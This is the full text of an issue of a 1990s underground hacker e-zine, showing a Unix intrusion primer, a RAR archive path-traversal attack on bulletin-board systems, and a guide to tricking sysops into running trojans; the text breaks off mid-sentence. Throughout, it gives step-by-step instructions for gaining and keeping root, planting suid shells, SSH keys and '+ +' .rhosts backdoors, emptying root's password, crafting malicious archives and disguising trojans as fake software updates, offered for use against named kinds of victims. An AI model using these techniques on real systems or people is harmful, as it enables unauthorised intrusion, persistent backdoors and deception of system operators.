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Black Hacker Magazine Issue 03
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Preface to the ascii version
Welcome to BHM#3. This zine is primarily distributed in a PC-VERSION with
reader, fonts music etc. All this has been removed, and your experience
will not be as cool ;) Well, for you unix/amiga/mac dudes, or pc dudes
with a crappy machine, here goes ... BHM#3!
1_1 : Disclaimer
1_2 : Welcome!
2_1 : Unix Hacking For Newbiez
2_2 : The Rar Bug
2_3 : Social Engineering
2_4 : A Way To Hack Unix
2_5 : Hackers vs. Warez d00dz
2_6 : Wombat: A Pcboard Batch Virus
2_7 : How To Get Root On a Linux
3_1 : Visa/Creditcard Scam
3_2 : Credit Card Scam #2
3_3 : How To Obtain A Visa
3_4 : Phone Scam
3_5 : Hackers Guide To INTERNET OUTDIALS.
3_6 : Visa Carding Made Easy
3_7 : How A Pyramid Scheme Works
4_1 : Easy Explosives
4_2 : Newbie Flooding (IRC)
4_3 : Fake Emails
4_4 : Finger Trick
4_5 : Trojanize EXE/COM Files
4_6 : Norwegian: Telenor Suger
4_7 : Norwegian: Hordaland PBX List!
4_8 : Ending Note
BHM is distributed and meant to be used for educational purposes only. The
creators of this product do not in any way advocate the implementation of
the information contained herein and as such will not be held responsible
for any use or misuse thereof.
The creators of this product will not be liable for any special, incidental,
consequential, indirect or similar damages due to loss of data or any other
reason. The person using the software bears all risk and consequence by
misusing this product and the information it contains.
Since some of the information this product contains can be misused
in a harmful manner the creators are not liable for any damage
caused by misuse of this product and the information it withholds.
If any of the information here within is misused you are doing it
at your own risk! If you are not sure about this, or if you do not
accept this, then do not use this product.
Black Hacker Magazine is not recommended for children, telco workers,
government employees, any law enforcement agency employees, busters,
warez d00dz, etc. If you are one of the above, then please press ESC twice,
then ENTER, and delete all files in current directory.
Some of the trademarks mentioned in this product appear
for identification purposes only.
- Keep hacking strong, Codeblaster
Welcome to Black Hacker Magazine - third issue!
I think I can say, without exaggerating, that this mag is getting better
and better for each time... It was hard getting it better than BHM#2, but
I think we did it! :) We are also growing, we have aprox 5 new members
since last time, and we're hoping on more!
This issue contains an informative & interesting mixture of bbs hacking,
unix hacking, other internet hints, pascal sources, phreaking and CC
scams! I'm sure you'll find this mag good, or at least interesting! ;)
We're changing our name, from The Black Hackers (TBH) to No Shit! (NS!).
This is mainly because TBH was a lame name all from the start, and just
meant as a 'cover-up' for me and TNSe when we were hacking lame bbs's.
We thought 2 secs about the lame name, and never dreamed of being a
hpa group like this! :).. Well, our new name is No Shit!, so you'll
probably find BHM#4 under the name of NS!-BHM4.ZIP ...
Just let me get one thing straight, the name of this magazine is BHM, as
in Black Hacker Magazine, not as in Black Hackers Magazine or The Black
Hackers Magazine etc. But Black Hacker (no S) Magazine. So, stop making
ansi's saying TBH Magazine ;) and mail me some saying BHM instead!
We need more members to keep this mag a quality mag. Writers of any kind
are welcome, either you're into hacking/phreaking/anarchy or just plain
writing! (We don't always write those 'how-to' texts you know, an example
of this is the 'Hackers vs. Warez d00dz' article in this mag.) So if you
wanna take part in the success of TBH, then consider joining now, by
mailing us at:
Greets goes out to all the op's at #hack who just love +k and +b, and
the dudes at #2600 whoze a bit nicer ;). Also, to everyone on #Food,
#Phreak, #Hacker, #Coding and #Pascal! Love yah dudes! =)
- Keep Hacking Strong, Codeblaster!
Unix Hacking For Newbiez
---- ----
U N I X f o r n e w b i e z
b y
---- ----
This phile is a hacker's introduction to UNIX. If you are a government or
telco worker, skip it. If you are familiar with UNIX, skip it. If you are
a system administrator, skip it. If you hack for destroying systems or
for espionage, skip it! The intention of this text is to give fundamental
knownledge about UNIX-systems to all those whose interst in computers
goes beyond programming, and newsgroup-chatting. This is an introduction
to the artwork of surfin' the net, not with a silly web-browser, but with
total control over the computer-wavez. Have Phun!
---- ----
Getting into UNIX and network services is easy, but anyone who want to
know enough to contol systems, must not only have a fair knownledge of
UNIX, but master it! To do that takes time and hard work. Until today
the only way of gaing such knownledge has been to read books and study
hard. But not anymore. Here I give you an introduction to UNIX
and network services, from a hackers point of view.
- Ok, enough gossipze, get to the point !!
OK, I will, I will.
Unix is the oldest operating system still in use today. It was made as a
contrary to Multics in the late 60's. From the late 70's there were to
major "styles" of UNIX, the System V from Bell Labs, and the BSD Unix,
from Berkeley. Today there are lots of variants of UNIX as each of the
different vendors make their own, and in addition there are some
"independent" operating systems. Each of the different unix-versions
today have their own history, derived from either System V or BSD. And
more important: Each of the versions today have their own system software
with their own bugs! This is important to know, because it is the bugs
you are going to use to enter a system.
So an average hacker has to know about the different systems. Here is a
short list over the most usual UNIX' today, which vendor they come from,
and on which processors they run. (today == early 1997)
OS Vendor Processor Derived From
IRIX Silicon Graphics MIPS Rxx00 System V
ULTRIX Digital (old) MIPS R2/3000 BSD
Digital UNIX Digital (new) System V (?)
HP-UX Hewlett Packard PA-RISC System V
SCO UNIX SCO Intel x86
FreeBSD (independent) Intel x86 BSD
Linux (independent) Intel x86 BSD
SunOS Sun (old) Sparc BSD
Solaris Sun (new) Sparc / x86 System V
Why do you need to know all this? Because you will learn that you can
recognize different OS's via the net, and when you learn about new bugs,
they will alwayz be for a specific OS. (OS == Operating System) You also
need to know the System V / BSD difference, because this traditional
difference has lead into differences in where you can find specific
system-files, different commands, different options to commands, and s0-0n.
UNIX is a multitasking, multiuser operating system. This means that
several users can be logged in at once and execute commands on the
system. Just like a BBS! Of course there are restrictions on what normal
users can do. Files have ownership and permissions, saying who owns the
file, and who can read from and write to it. On every unix-system there
is a system administrator account. The name of this user is always
'root'. r00t can do everything on the system, remove or edit eny file,
mount and unmount file systemz, shut down the machine etc. If you have
the root password on a unix box, you usually have just as much control of
it, as the people who are there, even if the box is on the other side of
the world. This means, of course, that the goal of every hack is to
become r00t, only then have you got control over the machine.
we nee to learn some basics. The UNIX filesystem starts at / and expand
downwards as a directory hierarchy. Anyone familiar with D0S should
recognize this. The differenze is that several disks can be mounted on
the same logical filesystem. So, ie /usr/bin can be on an other disk than
/home . There are basic commands for filelisting and manipulation. Here
is a brief list with their lamey D0S equivalents:
ls dir
rm del
mkdir md
rmdir rd
cat type
cd cd
mv move, ren
echo echo
To every such command you can give a list of options. Useful options for
the above commands are:
ls -l list files with ownership and permissionz.
ls -al also list files beginning with '.', not listed per default.
ls -ld list the permissions on a directory instead of its contents
rm -f force flag - overrides incorrect permissonz etc.
rm -rf remove all files in all subdirectories
(rm -rf / will remove all files on the system, and thus bring
the machine down for good. Don't do thiz!!)
cat >foo takes input from the standard input and cat it to the file 'foo'
The last line brings in another concept with the shellz in UNIX. The
shell is the program that executes the commands you give. Like
COMMAND.COM in DOS. Common shellz today are bash and tcsh. These are mere
programming languages in their own, and can be used to execute scripts.
The shellz and the unix kernel provide a feature called pipes. These let
you send the ouput from the program as the input to the next program.
This is done using the '|'. You can also send the output to a file using
'>', or take the input from a file or your shell '<'. This feature has
lead to implementations of filters that format your output. Here are some
of them:
grep - show only the lines with a special word
cut - show i.e. only the first 3 chars of the lines
more - break the output into pages.
less - more and less is more or less the same. (less is more than more)
sort - sort the output
uniq - take awau equal lines
For instance: you want to see a long list of files with perms. You type:
ls -al | less
You want to find the password entry of root, and save it in a file.
cat /etc/passwd | grep root >./yankeedoodledoo
The usefulness of the pipesystem is incredible. You just need some
practice. The observant reader may have noticed that the length of the
last filename was longer than 8 chars. In unix there are no restrictions
on filename lenghts. The directoy . is always the directory it is in, the
directory .. is always it's parent. This means for istance that 'cd ..'
is a valid command while 'cd..' is not (unlike DOS). Before we look at
file permissionz, I want to mension the command 'man'. 'man' gives you
the online manual page for the command you want to try. This is useful
for newbiez, but also for old gurus who can't remember the correct
options. Ie.
man ls - gives you the manual page for ls.
These features are central in the protection system of unix. If you use
'ls -l' a typical directory-entry looks like this:
-rw-r--r-- 1 root deamon 158 Nov 6 00:40 chatscript
In addition to file name, date and time, we here have the owner (root),
the group (deamon), the number of hardlinks, and the permissions. The
permissions are read (r), write (w) and execute (x) for owner (first),
other members of the group (second) and all other people (third).
So the file 'chatscript' can by read by everyone, but only written to by
'root'. The first char in the perms can be 'd' for directory, 'l' for
link and '-' for file. It can also be other things you don't have to
worry about. You can change the permissions with the 'chmod' command.
Using 'chmod a+w chatscript' would make chatscript writable for everyone.
r00t can use the 'chown' command to change ownership on a file. Ie.
'chown mao.commies chatscript' would make the file owned by mao in the
group commies. There is also a special bit called suid-bit which have
made a lot of usable bugs in unix. The suid-bit, when set, makes the
program run with the permissions of the owner of the file, even when run
by anybody else. This is particularly used by system-files, run as users,
which get r00t permissionz when run, to have special privileges. Ex:
-r-sr-sr-x 1 root bin 164060 Aug 23 1995 sendmail*
This program will, when run by user 'mao', have permissions as 'root' -
it can do everything. Sendmail is a very big and complex program and has
been exploited by hackers for years and years. For instance the infamous
'Internet Worm' released by Robert Morris in 1988 was partly based on a
bug/hole in sendmail. As you may understand, executable programs that are
suid root are the absolute best and easiest way to become emperor over a
system. Bugs in these programs are found often, and usually posted on
security newsgroups / mailinglists on the Internet together with
bugfixes. Any hacker can just scan those groups, find a bug which suits,
and use it. As we can see, the above version of sendmail is rather
old, which means we can probably find a bug in it which we can use,
to become r00t.
Another possibility with suid programs, is the ability to leave a suid
shell as a hole in the system. Consider thiz:
-r-sr-sr-x 1 root bin 299649 Aug 10 1995 bash*
Any user can run this shell, and will effectively become r00t upon so.
This file can be hidden anywhere in the filesystem.
Another interesting property of permissions is that you don't have to have
write permission on a file to rm or mv it. It's enough with write
permission to the directory in which it resides. If for instance you see
the permissionz on the directory /etc is this:
drwxr-xrwx 2 root root 1024 Aug 03 1995 etc/
this means that you can remove the file /etc/passwd. Doing so will make
the system useless as nobody (not even root) can log in. After doing so,
the system will have do be reinstalled. It would be more interesting to
add another entry on the password file. This can also be done, by using
the feature that a new file inherits the permissions and ownerships of an
old file when it's mv'ed to the same name. So if the /etc directry has
permissions as above, anyone can make a copy of the password file,
remove the password of 'root', mv it onto the old 'passwd' file, and log
in as 'root' without a password. (And then set a new root-password so
that the old sysadms loose control...)
To conclude: Permissions and ownership is very important for a hacker to
understand, especially the implications of the suid-bit on system
programs. You've got an introduction here. Practice on your nearest
unix-box, read and learn.
It's useful to have a small overview over a the normal systems directory
structure. This offcourze varies from system to system, but is normally
very similiar on systems with the same operating system. Let's take a
M:~> ls /
bin/ root/
boot/ sbin/
dev/ tmp/
etc/ usr/
home/ var/
lib/ vmlinuz
the directory structure of my machine, M, reflects that it is a linux
machine. More about linux later. The first directory, bin/ contains
binaries for common programs like ls, mv, bash, etc. boot/ is a directory
for linux boot images. dev/ is the device directory with all external
devices which you'll learn more about later. etc/ is the directory for
all the system configurations files. home/ contains the homedirectories
for the users. root/ is the homedirectory for root. sbin/ is a binary
directory for sysadmin tools. tmp/ is a world-writable directory for
temporary files. usr/ is the installation directory for user programs,
and var/ is the dir for variables, i.e. logs. You will soon recognize
/etc as one of the most important directories on any system, despite its
odd name. Here you can find the password file /etc/passwd, all
configurationz files for network services, and so on. Secondly, the
binary dirs are important. Remember, if you have write permission to any
of these, you can sneak in a trojan in any program that root might run.
If he does, the system can be yours. The file vmlinuz is the boot image
for the system, containing the system kernel. On other OS's this file is
commonly called 'unix' which very much descibe it's contents. Do not
remove this file. The system will go down and not come up again. This can
also be said about many files in the /etc dir. If you for instance remove
/etc/lilo.conf (on linux) the system will not be able to boot, because
the lilo (linux loader) not will be able to know what to do.
Any UNIX-hacker also needs to understand the concept of processes. On a
UNIX system every program that runs, has it's own process. This process
is allocated memory-space and a time-slice. It is not allowed to read or
write anything outside it's own memory space. If it does so, it will be
terminated by the operating system with the message:
Segmentation Fault
which is similar to the "General Protection Fault", Windows users may
have encountered. The process has a user id, and a group id. It is only
allowed to access files with the corresponding id. Processes run by
'root' can access anything. To get a list over processes you use the 'ps'
command. Just 'ps' gives you the list of your processes, while 'ps -ef'
(System V) and 'ps -aux' (BSD) give you a comprehensive listing of all
processes running on the system. On such a listing you will notice a
considerable amount of processes run by r00t. These are for the most
deamons - system programs run to take care of system tasks - network
communication for instance. It is possible to send a signal to a process,
using the 'kill' command. There are a great variety of signals, usually
summarized in the file /etc/signals. The most common are HUP, TERM and
KILL. HUP (Hangup) will respawn a deamon. Processes which are not a
deamon will usually terminate on this signal. TERM is a signal to the
process to tidy up and die (terminate). KILL is really not signaled to
the process, but to the kernel. This signal will cause the kernel to
remove the process and kill it. Ofcourse a user can only signal his own
processes, and r00t can signal any process on the system. Consider this
example. You have become r00t on a system, but are afraid that the
sysadms are watching you. With the command
ps -aux | grep root | grep bash (assuming BSD - system)
you find out the process number of the shellz r00t are running. You then
determine which shell is your own. (Remember, you are also running a
shell as r00t!) If there were two shells and the PID (Process ID) of the
other's was 21345, you throw him out with:
kill -KILL 21345
Shellz like bash will not terminate on TERM, so you have to KILL them. If
you are killing a users process, say netscape, the user will get the message:
netscape: Killed.
He will then start to wonder who killed his netscape. A smarter move
would be to signal the process with another signal, like this:
kill -SIGXCPU 22345 or
kill -SIGBUS 22345 or
kill -SIGSEGV 22345 .
which will produce the following results accordingly:
netscape: CPU time exceeded.
netscape: Bus Error.
netscape: Segmentation Fault.
As the signals is the mechanism used by the kernel to signal
these occurences, it is impossible for the user to tell the difference
between a real SegFault, and one gererated by 'root'.
Another thing I will discuss here, is the login processes. When a user
logz in, the program /bin/login is executed. When the user has entered
his name and password, he get his shell, which is specifyed in the
password file. (Users can change shell with the 'chsh' command.) His
login name is then written to the files /var/adm/utmp and /var/adm/wtmp.
These files are important because at all times, they tell who are logged
in. The user can see who are logged in by using the commands 'who' and 'w'.
M:/bin# who
root tty1 Dec 19 18:16
Here we can see that root is logged in, and is using the tty1. tty means
text-terminal, and is a standard unix device. So, what's a device? Well,
a device looks like a file in the file system but it is not. Everything
attached to the machine is devices. Mouses, modems, serial lines,
harddisks, etc etc. 'root' can read from, and write to devices using the
> and < and /dev/device. In the above case, if you do:
M:/bin# cat >/dev/tty1
You're machine is under siege, sucker!
will send the message to root.
the command:
M:/bin# cat </dev/tty1
will result in everything root types will end up in your tty and not in
his. Very irritating. But remember: On most systems, only r00t can do this.
Another thing you might want to do is to have a l00k at which processes
consume the most CPU-time on the system. The program 'top' is made for
this, and usually gives you a hint about heavy processes like
Alec-Muffet's 'crack-pwc'. More about password cracking later. There are
also some more user-friendly programs to communicate with other users on
the system. Among these are 'talk', 'finger', 'ytalk', 'write', 'wall',
'rwall', 'rwho' etc etc. Which brings us over to:
In these over-Internet-hype ages, most people probably know about the
most important network-services on unix. I will summarize the most
important stuff, and quickly get into the more interesting.
Every machine on the Internet has it's own IP-address in numbers. Each
machine can be contacted using TCP on 65536 different ports. On
unix-systems the ports below 1024 are restricted to the system. The ones
above, can be used by normal users. The ports are usually summarized in
the file /etc/services. Here is a short summary of some important network
Remote login telnet / telnetd
rsh / rshd
on / rexd
ssh / sshd
File Transmission ftp / ftpd
Web ... / httpd
Finger finger / finger
Mail ... / sendmail
Name service ... / bind
NIS / YP ... / ypbind, ypserv
NFS mount / nfsd, mountd
etc etc. To fin out which ports runs servicez on a machine, use the
program 'strobe' availible on the net. The results of strobing can be
very interesting, and often leads to finding holes.
Regarding network services the hackers interest is often to find a way
to get into a system without having an account. This can be tricky, but
fortunately, most of the services that are needed to tie the Internet
together are complex, which means that they have many potential holes,
and are difficult to administrate. In the following list I have tried to
present stuff without getting too detailed. The actual exploration is
left as an exercise to the reader.
- Rexd
This is an old deamon that allows a user to run a command on the system
without password authentication. Thus, anyone can run a command on the
system. This can be mailing out the password file, opening a user account
via rsh or other things. For details, read the man page of 'on'.
- Rsh
This is a mechanism that let users run a command on a machine on the net
with authentication. The user makes a '.rhosts' file on his home
directory including entries for the hosts he trusts: the hosts who can
run commands as him on this system. The letter '+' is a wildcard. I.e. if
the user mao on the machine has the following entries
in his .rhosts: mao mao
it means that his user on these other machines can run commands as him on without providing his password.> rsh>
'root' on shanghai and hongkong can also run programs as him on peking,
because r00t can become 'mao' using the command 'su - mao' (Remember:
r00t can do anything!) If he had written:
+ mao
anyone in the world could run commands as him on peking, because they
could just make a 'mao' user on their own system, and then go ahead. To
further complicate this there is a systemwide .rhosts file called
/etc/hosts.equiv. If there's a '+ +' in this file, anyone in the world
can run commands as any user (excluding root) on the system. As you may
understand, the rsh mecanism is very good for obtaining account on other
systems. If you can execute commands on a system, you can easily obtain
an interactive shell by executing: echo "+ +" >.rhosts and then log in
using rsh. It is also very good for going further when you already have
become r00t on one system. All you have to do is checking all the users
.rhosts files (i.e. by using the 'find' command) and then get user
accounts on other machines using the 'su' and 'rsh' commands.
is the standard way of logging in remotely. It doesn't present any
obvious security problems, because a user always have to give his
password ... eh wait... password ?? Yes. If you have r00t privileges
on a box you can use an ethernet sniffer program to sniff the password,
because the password is transmitted in clear text. Anyone who is r00t on
a box (or has a PC without unix) can sniff passwords from sessions on the
local network. Very useful. Another usefullness with telnet is that
when you telnet to a machine, you usually get a g00d hint of what kind of
system it is, and thereby you can find useable bugs on it.> telnet
Linux 1.3.75 (poor) (ttyP0)
poor login:
aha a linux box... (if you have a user, the system version can be found
with the command 'uname -a')
As previous mentioned sendmail is a suid program both for local and
remote use. It therefore presents major security problems. You can
determine which sendmail version a box is running by telnetting to it's
mail-port:> telnet smtpd
220-major Sendmail 8.6.12/8.6.9 ready at Thu, 19 Feb 1997 00:00:05 -0600
220 ESMPT spoken here
aha! an old Sendmail version... By using bugs in old sendmail versions
one can gain user and r00t access on a box. Another interesting feature
by telnetting to the mailport is the ability to check certain users on
the box:
expn root
250 John Major <johnX07
interesting way to find out who's in charge of the machine!
is a new remote login standard that ensures encryption on the net, and
public key authorization. Very cool, and very secure. Except for the fact
that if you compile your own private key, using 'ssh-keygen', and put the
public key in your victim's ~/.ssh/authorized-keys you have found the
perfect backdoor to come back into the system. Remember that the name of
the key is only a name. If you want to leave a hole on mao's account,
call your key maoX07
Use 'man ssh' for more info about ssh.
-ftp and www
is not so interesting for the hacker. There have been reported some bugs
in the httpd's around. You can find more info about this on the web.
-Domain Name Service (DNS)
is the service that maps a name over to an ip - adress. Whenever a
machine tries to adress, the local name-server is
called to map the name to an ip-adress, say If the local
name-server hasn't got the answer, the caller is given the address of the
name-server futher up in the hierarchy. This means that if you have
control over the name-server you can effecively get control over the
machines trusting it, by giving yourself a false name. You do this by
manipulating the files under /etc/named. An interesting prospect about
this is that the nameservers are hierarchial, which means that there is a
top-server, which maps the names .com, .net, .org, .gov, .mil etc. If you
get control over this machine, you have the whole Internet between your
thumb and index finger.
-Name Information Service (NIS / YP)
is applied by large systems with many users, to ease the control of
password information, host information and other. This is interesting,
because if you hack the 'ypmaster' you get control over the others by
making new accounts, or changing the passwords of existing accounts.
Another feature is that most yp-running systems is misconfigured in
such a way that it is possible for any user to retrieve the password file
of the system using the 'ypx' program, which is availible on the net.
Passwords can than be cracked, and whopee...
-Network File System (NFS)
is a major achievement in network technology, and is widely used in
unix-systems. File systems can be exported, and mounted on remote
machines using the 'mount' command, and then looks like a normal file
system to the remote user. Filesystems can be mounted read-only or
read-write. Unfortunately (to the sysadms hehe) NFS is very often
misconfigured. The filesystems exports are controlled in the file
/etc/exports, which demands a very strict format. Misunderstandments here
often lead to filesystems being exported rw to everyone. So then
you can mount it on your own box, and put a "+ +" in any users .rhosts,
for instance. Note that only the owner of the file can manipulate it, and
the owner is recognized by UID number, not name. So before manipulating
the remote files, you have to make an account on your local system with
the same uid as the owner of the remote files. Normally exportz is not
valid for r00t, so r00t can not manipulate root's files on the remote
system. But sometimes the filesystems are exported with root-capability.
Then it's easy: copy a shell to the exported disk, make it owned by r00t, and
chmod it to be suid. If you can run a command on the remote machine -
you're root on it!
A command that can be very useful is the 'df' - diskfree. This also gives
information about any nfs-mounted filesystems. The command 'showmount'
tells you which hosts mount from this host, and 'showmount -e' tells
which filesystems are exported from this host.> showmount -e
/var/mail (rw) (everyone)
/home (rw) (everyone)
Let'z delete their mail!
The fingerd has traditionally contained bugs, but is now regarded as
secure. Anyhow, fingering might be interesting, because you can se who is
logged on the system:
finger X07
LoginNameTty Idle Login Time Office Office Phone
bill Bill Gates1 Feb 10 01:56
wifeSome day I wil 2 Feb 10 02:01
and you can find more information about them by fingering one person in
finger wifeX07
Login: wife Name: Some day I will have a wife
Directory: /home/gates/wife Shell: /bin/bash
On since Thu Feb 10 02:01 (GMT -05) on tty2 12 seconds idle
No mail
as you can see we can find out lots of interesting stuff. As every hacker
should know, gathering information is half the job!
Learning to use network services to the common good for the hacker
community is only a matter of practice. The network is the gateway to
the computer. Have Phun!
Off course the UNIX-world got it'z own window-system. The X-Windows system
permits different window-managers, that the users can configure to suit
themselves. Thus, X-Windows can be configured to look like any other
Window system. The m0st important feature with X-Windows is the ability
to send windows from applications across the network. Which display an X
application will connect to is determined by an environment variable in
the shell. For instance:> xhost +> rsh> export> xterm &
will start an xterm (window with terminal) on Clinton's machine, but the
window will appear on Yeltsin's machine. The & sign tells the shell to
start the process without waiting for the process to end. The 'xhost +'
told Yeltsin's machine that his display is opened for any window to
connect. This is dangerous. He should have written 'xhost', because Clinton can now discover what's
happening with the 'ps' command, and see that Yeltsin has opened his
display. He can now> import -display -window
root spy.jpg
and on the resulting image, he can view the secret files Yeltsin was
working on in the background. There are various reasons why displays
should not be opened to everyone. The command above is just one
possibility. Despite this, people seem to think it'z easier just to type
xhost +, and thus open their hearts to everyone. It's important to
recognize the fact that to use the many holes one can find in the X
system, you normally have to be on an X system yourselves.
We will now turn over till some more practical matter. As you may have
understood, every unix-system uses password authentication for its users.
On normal systems the password file is stored in /etc/passwd. On systems
using NIS/YP, the password filed can be retrieved by the command 'ypcat
passwd'. On some newer systems, the password is shadowed and can not be
view by the user. Bad luck! However, on most systems the password file is
availible. The password is encrypted using a DES one-way encryption with
a 12 bit salt. This means that the password is never decrypted when
checked, but the entered password is encrypted using the same salt and
algorithm, and then compared with the one in the password file. The
algorithm is considered secure. It is therefore not possible to crack a
password by breaking the algorithm. What IS possible anyhow - is to
utilize people's silliness. People often choose common words as
passwords, not speaking of using their phonenumber or birthdaydate.
Silly. What we have to to is to obtain a list of common english words (or
any other appropriate language), encrypt them with the different salts
and try them against the password file. Such a program, Crack, is readily
availible on the net. It even tries permutations of the users loginnames.
A session of Crack will take you a little week on a Pentium Pro 200 with
a password file with 1000 users, and a very big dictionary. Fortunately the
m0st common combinations are tried first, so you will have good chance of
a hit within a few hours. (Remember: The unix-password is only 8 chars.)
Sample from password file:
root:sPDumSuuJqYt6:0:0:The r00t of all Evil:/root:/bin/bash
saddam:PshuyeSRD5Cr5:500:100:Saddam Hussein:/home/saddam:/bin/bash
On this sample we see the encrypted password, uid and gid (user and group
id), the home directory and the user shell. A * in the password field
will disallow a user from login. So will a nonexistent homedir, or shell.
The bruteforce approach is also a possibility. We can normally assume
that the root password not is a common word, and therefore is hard to
crack with dictionarys. The bruteforce method will try every possible
combination of the password aaaaaaaa, aaaaaaab, etc. Unfortunately such
a method will take very long time if you don't know anything about the
password. On a Pentium 130 the following figures are guidelines : (after
this time you'll be guaranteed to have the password, the average is the
5 char password or 8 char password with 3 known: 48 hours
6 char password or 8 char password with 2 known: 120 days
7 char password or 8 char password with 1 known: 20 years
8 char password : 120 years
As you can see: watching a sysadm while typing the password can give
reward, even if you can't cath everything he types. As a thought
experiment we can measure the figures of cracking the 8 char password on
a Cray with a matrix of 64 processors, each being about 4 times the speed
of the Pentium 130. This would take about 6 months. But who can use a
Cray 6 months anyway? The experiment of making a bruteforce cracker
should be easy for any programmer. Remember to use the ufc-crypt() routine
as a replacement for the system crypt() which is much slower!
N00ne can be a specialist on every operating system. You have to
spesialize and find what you like, and dislike with specific OS's. As
this goes for me too, it will probably shine through in the text which
OS's I have most experience with.
Linux is a free operating system written by a lot of people gathered
together via newsgroups on the net. The kernel is written by Linus
Torvalds from Finland, who is still making updates by himself, helped by
a large community of programmers. Linux runs on the Intel x86
architechture, that is, common PC's, and is increasingly popular among
hackers, and also in universities and commercial sites. Because Linux is
so popular among people who test things very well, Linux is not full of
holes, but rather secure. Anyway, there are holes. These are especially
found in conjunction with suid system programs. Information about these
can be found anywhere on the net, as the operating system itself is
evolved on the net. There has been made sevelar linux distributions, the
most popular being Debian, Slackware and RedHat. The linux kernel has now
been released in versions up to 2.0.x.
Ultrix is a very old and buggy system from Digital, containg almost only
features from BSD UNIX. The system has since long been abandoned by
Digital, but is still used many places because it's the only system on
old DECstations with processors from MIPS. Ultrix is known for it's
unsecure NFS, which should make it easy for a user to gain access.
I don't really know much about this operating system from Cray. It's
supposed to be very stable and secure, perhaps it has to be so since it
runs on the most powerful computers in the world, equipment worth
millions of dollars. Just thought I had to mention it.
Is the OS from Silicon Graphics. SGI's rule of thumb is to make their
computers easy to understand and administate for the desktop user. The OS
includes many system administation tools that are suid. Exploits for
these are readily availible on the net. SGI's OS also ships with users
without passwords. They advice their customers to put passwords on these
accounts, but many forget. Easy way to gain access. More info on password
empty account and other security flaws can be obtained from SGI's own
security department! Try Irix today comes in versions 5.3,
and 6.2 .
-NetBSD & FreeBSD
Are operating systems derived from BSD, made for the x86 architechture.
These OS's has lost much to the Linux wave, but still exist all over the
world. Security vulnerabilities for these are mostly similar as for Linux.
-SunOS and Solaris
Are the OS-es for Sun's SPARC architechture. They're known for being
relatively stable and secure, though it's also here possible to find the
necessary bug. Sun has a very informative web-site about that! Solaris
2.5.x which is the common version nowadays also ships for the x86
Architechture, and includes a API for Windows, which means that it's
possible to run Windows programs under X. Very fancy.
-AIX and HP-UX
are the OS's from IBM and HP respectively. They are both know to be very
peculiar and non-standard, perhaps that's why hackers are not so
interested in them. But both OS-es are notably known for various bugs. On
the web you can find a site with 'HP bug of the week', publishing scripts
with r00t-exploits for HP every week. Phun, isn't it?
I think this must conclude my section about different operating systems.
The more you explore, the more you will learn, and you'll soon find out
that things are different on other OS's than the one you're used to!
This phile has been all about learning the UNIX system, finding holes in
it and use them. I have not written too many details. Not because I'm
afraid for them being used (God forbid!), but because the details
discussions on these matters are lenghty, and usually can be found on
the net. I hereby urge you to learn more about UNIX by testing it out.
Find your own holes, and use them. But remember. Follow the rules. Just
peek around, annoy people. Have phun with people. But don't mess it all
up. You will suddenly find yourselves with no friends and a hellawalot of
people coming after you.
Best rgrdz and happy hunting from
The Rar Bug
We've previously released this bug to the public (check out TBH-RAR.ZIP), but
that was about RAR 2.0 áeta version, and this shit still works in the final,
registered 2.x version. It works, you just have to do something extra. Those
lamahs ;)
[What is this bug?]
For those of you who don't already know what the bug is, it can be used to
extract files to ANY directories on the sysop's HD, if the sysop has support
for RAR in his upload processor. This means, in BBBS/MBBS you can add scripts,
in S/X you can add new commands, in PCB you can add new PPE's, and all that
without social engineering and getting sysop to run a trojan etc.
[How to do it]
1) Place the files you wish to extract (PPE, scripts, whatever) in a dir,
fex; C:\TEMP\SHIT\FILES\*.* <- files here.
2) Chdir to C:\ and run RAR. Pack C:\TEMP into fex. DUCADO.RAR
3) Now, use a hex editor (like norton's diskedit) and patch the path/name
string (C:\TEMP\SHIT\FILES\HACK.PPE) to the directory you want it
extracted to, fex. C:/PCB/HELP/HACK.PPE
Remeber to use the '/' and not the '\' cause that will fuck up.
4) If this was version 2.0 beta, we would all be set to go now, but in the
new version (2.x final) there's one more thing you have to do;
So, run RAR once more, and press ALT-F8 to repair DUCADO.RAR.
5) Now, upload it to your victim, and the files will be extracted to the
directories you specified.
Now, go hack some lamah, and if your name is Eugene Roshal then bugtest
your shit before releasing it to the public next time.
Original Consept by Codeblaster
Rar bug discovered by Ripperjack.
Social Engineering
Social Engineering
I got some complaints on the previously releases of BHM, since we had several
examples of trojans for systems, but no social engineering stuff. (For those
of you who don't know what social engineering is; It can be many things,
from getting a lamer to give you his password over the phone, to getting the
sysop to run one of your uploaded trojans - in this text, I'm talking about
the last one.) Yeah, you're probably right, maybe getting the sysop to run
the trojans is harder than making them sometimes. (Although I've never had
any problems with that - maybe cause the dudes I've hacked have all been
lamahs? ;)
Well, anyways. I ran this little problem through the hpa message conferance at
my board, and got some response.
Different ways of getting the sysop to run your trojan:
1. Download a file and look at his add. Then call back a bit later, and tell
him that his add really suxx, and that he needs a new one badly if he don't
wanna look like a lamer. Offer making one to him, tell him that you make
some really nice addys, and you can even get him a good ansi if he hasn't
got one! :) To make this less suspicious it's probably best if you want
something back for your coding, so say that you want better ratio at his
board or something. He'll most likely accept your offer, so make the
trojan, call back a couple of days later, and upload it. Remember, it
has to be an INTRO there too, so the sourcecode would be:
| |
| |
| SOME |
The chances for sysop running this is pretty big, so if something would
fuck up here, it's probably your lousy coding ;)
2. Find out what utils the sysop use at his board. Let's say, that the lamah
uses Pcboard. Then you download the newest version of PFED (wich he most
likely uses) and unpack it. Patch all files (diz, doc's, exe's etc.) so
that the version is one version higher (fex. 1.09 instead of 1.08). Then
replace the main file (or the setup file) with your trojan, use Nowhere
Utilities (or whatever) to increase the size of your exe file, so that it's
just as large as the original exe file. Upload the file to the board you'r
going to hack. Most lamer sysops won't bother checking if PFED 1.09 has
been released yet, so they will probably just unpack it and try to set it
up. But remember, you have to make something that at least LOOKS like the
original UTIL, and if you're going to show an error message or something,
then make the error message just like it would be in the original util.
In PFED that kinda error message could look like this:
³ ßßßß
ÀÄÄÄÄ ßß ÄÄÄÄ Äúú ú ú
MEMORY INFO: Conventional: 301k Stack: 2644
DISK INFO: Dir: C:\PCB!\PFED Free Space: 424k
Before you upload the util it might be a good idea to chat a little with
the sysop, and after a while ask him something like: "Why aren't you using
the latest version of PFED? - don't you know it has been released 3 days
ago." Or something like that, then offer to upload it. If you do this,
the chance that sysop will start it is alot bigger.
3. If the sysop is a Pascal programmer you can always use the "TPU method".
Make/rip a simple intro source, and add some music to it (fex. HSC files
that uses AGSHSC.TPU or ANTARES.TPU .. whatever), then you add a second
TPU, that you've made yourself (call it fex. MUSIC.TPU). What you know,
